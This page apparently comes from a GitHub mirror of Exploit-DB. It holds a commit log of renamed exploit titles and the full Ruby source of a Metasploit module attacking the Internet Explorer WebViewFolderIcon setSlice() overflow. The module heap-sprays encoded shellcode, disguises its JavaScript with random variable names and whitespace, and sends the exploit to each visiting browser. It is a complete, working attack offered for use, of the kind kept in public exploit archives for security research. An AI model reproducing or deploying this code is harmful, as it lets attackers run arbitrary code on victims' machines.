bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/remote/2440.rb
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

135 lines
3.8 KiB
Ruby
Executable file
Raw Blame History

# This module is part of the metasploit framework3
# svn co http://metasploit.com/svn/framework3/trunk/
require 'msf/core'
module Msf
class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::Html
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
'Description' => %q{
This module exploits a flaw in the WebViewFolderIcon ActiveX control
included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
during the Month of Browser Bugs project (MoBB #18).
},
'License' => MSF_LICENSE,
'Author' =>
[
'hdm',
],
'Version' => '$Revision: 3783 $',
'References' =>
[
[ 'OSVDB', '27110' ],
[ 'BID', '19030' ],
[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Get a unicode friendly version of the return address
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
# Randomize the javascript variable names
var_buffer = Rex::Text.rand_text_alpha(rand(30)+2)
var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
var_x = Rex::Text.rand_text_alpha(rand(30)+2)
var_i = Rex::Text.rand_text_alpha(rand(30)+2)
var_tic = Rex::Text.rand_text_alpha(rand(30)+2)
var_toc = Rex::Text.rand_text_alpha(rand(30)+2)
# Randomize HTML data
html = Rex::Text.rand_text_alpha(rand(30)+2)
# Build out the message
content = %Q|
<html>
<head>
<script>
try {
var #{var_unescape} = unescape ;
var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;
var #{var_x} = new Array() ;
for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {
#{var_x}[ #{var_i} ] =
#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
}
for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
}
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
<body>
#{html}
</body>
</html>
|
# Randomize the whitespace in the document
content.gsub!(/\s+/) do |s|
len = rand(100)+2
set = "\x09\x20\x0d\x0a"
buf = ''
while (buf.length < len)
buf << set[rand(set.length)].chr
end
buf
end
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response(cli, content)
end
end
end
# milw0rm.com [2006-09-27]
Reference in a new issue View git blame Copy permalink